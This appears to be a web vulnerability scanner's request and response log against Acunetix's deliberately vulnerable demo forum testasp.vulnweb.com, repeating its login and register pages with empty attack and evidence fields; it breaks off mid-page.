<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=81 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=82 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=83 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D83" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 407 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Templatize.asp?item=html/about.html Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:39 GMT Content-Length: 3256 |
Response Body - size: 3,256 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=/Default.asp? |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=/Default.asp? HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 3124 |
Response Body - size: 3,124 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FDefault%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:38 GMT Content-Length: 3615 |
Response Body - size: 3,615 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 355 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:39 GMT Content-Length: 3613 |
Response Body - size: 3,613 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" 